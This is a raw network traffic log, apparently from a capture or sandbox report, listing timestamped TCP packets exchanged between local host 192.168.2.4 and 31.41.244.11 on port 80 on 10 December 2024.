Dec 10, 2024 00:43:11.692078114 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.692126989 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.692193985 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.692241907 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.693630934 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.693680048 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.693728924 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.693775892 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.695187092 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.695230007 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.695272923 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.695338964 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.696671963 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.696723938 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.696787119 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.696840048 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.698177099 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.698225021 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.698288918 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.698333979 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.699703932 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.699757099 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.699806929 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.699852943 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.701102972 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.701149940 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.701219082 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.701258898 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.702600002 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.702646017 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.702677965 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.702719927 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.703964949 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.704010963 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.704090118 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.704135895 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.705410004 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.705461979 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.705543041 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.705583096 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.706830025 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.706881046 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.706953049 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.707000971 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.708256006 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.708307028 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.708323956 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.708369970 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.709623098 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.709665060 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.709727049 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.709770918 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.710942030 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.710988045 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.711026907 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.711076021 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.712306976 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.712354898 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.712467909 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.712512970 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.713675976 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.713721991 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.713810921 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.713857889 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.715014935 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.715061903 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.715145111 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.715188026 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.716351986 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.716397047 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.716454983 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.716497898 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.717782974 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.717825890 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.717850924 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.717890024 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.719043970 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.719093084 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.719131947 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.719176054 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.720335960 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.720377922 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.720458984 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.720499039 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.721645117 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.721693993 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.721708059 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.721750021 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.722994089 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.723031044 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.723301888 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.723337889 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.724344969 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.724385977 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.724410057 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.724447966 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.725629091 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.725668907 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.725758076 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.725797892 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.726973057 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.727032900 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.727062941 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.727102995 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.728311062 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.728348017 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.728502989 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.728543997 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.729654074 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.729697943 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.729767084 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.729806900 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.730978012 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.731019974 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.731093884 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.731137037 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.732307911 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.732352018 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.732405901 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.732449055 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.733639002 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.733686924 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.733735085 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.733774900 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.734961987 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.735021114 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.735061884 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.735100031 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.736303091 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.736351967 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.736407042 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.736449003 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.737649918 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.737704992 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.737737894 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.737781048 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.738960981 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.739011049 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.739109039 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.739151001 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.740288973 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.740348101 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.740396976 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.740446091 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.741624117 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.741673946 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.741755009 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.741803885 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.742973089 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.743020058 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.743055105 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.743100882 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.744303942 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.744349957 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.744383097 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.744426012 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.745616913 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.745666981 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.745721102 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.745764971 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.746939898 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.746999979 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.747082949 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.747124910 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.748313904 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.748363018 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.748430967 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.748478889 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.749607086 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.749664068 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.749809980 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.749865055 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.750941992 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.750994921 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.751024008 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.751071930 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.752262115 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.752315044 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.752377987 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.752422094 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.753597021 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.753645897 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.753710985 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.753756046 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.754935026 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.754987955 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.755019903 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.755085945 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.756275892 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.756328106 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.756395102 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.756436110 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.757587910 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.757636070 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.757703066 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.757750988 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.758920908 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.758969069 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.759041071 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.759088993 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.760215044 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.760262966 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.880347013 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.880436897 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.880486012 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.880536079 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.880922079 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.880964994 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.881045103 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.881089926 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.882005930 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.882056952 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.882116079 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.882163048 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.883126974 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.883173943 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.883302927 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.883353949 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.884222984 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.884264946 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.884324074 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.884367943 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.885339022 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.885387897 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.885443926 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.885488987 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.886419058 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.886464119 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.886534929 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.886580944 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.887537003 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.887588978 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.887598038 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.887648106 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.888672113 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.888720989 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.888761044 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.888808966 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.889769077 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.889816999 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.889822006 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.889863014 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.890922070 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.890968084 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.890975952 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.891025066 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.891977072 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.892021894 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.892157078 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.892201900 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.893079996 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.893129110 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.893155098 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.893205881 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.894165039 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.894216061 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.894282103 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.894331932 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.895270109 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.895328999 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.895354986 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.895401955 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.896387100 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.896437883 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.896507025 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.896553993 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.897531986 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.897589922 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.897615910 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.897664070 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.898580074 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.898628950 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.898660898 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.898710966 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.899693012 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.899740934 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.899808884 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.899856091 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.900811911 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.900857925 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.900934935 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.901007891 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.901925087 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.901976109 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.902080059 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.902127028 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.903028965 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.903076887 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.903167963 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.903218031 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.904129982 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.904170036 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.904231071 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.904277086 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.905230999 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.905278921 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.905323982 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.905374050 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.906369925 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.906421900 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.906503916 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.906554937 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.907500982 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.907548904 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.907581091 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.907628059 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.908535004 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.908586025 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.908649921 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.908699989 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.909681082 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.909727097 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.909754038 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.909801960 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.910779953 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.910830975 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.910901070 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.910952091 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.911854029 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.911902905 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.911982059 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.912034035 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.912971020 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.913022041 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.913106918 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.913156033 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.914057970 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.914107084 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.914134026 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.914179087 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.915193081 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.915246010 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.915285110 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.915330887 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.916292906 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.916344881 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.916414022 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.916501999 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.917392015 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.917443037 CET	49790	80	192.168.2.4	31.41.244.11
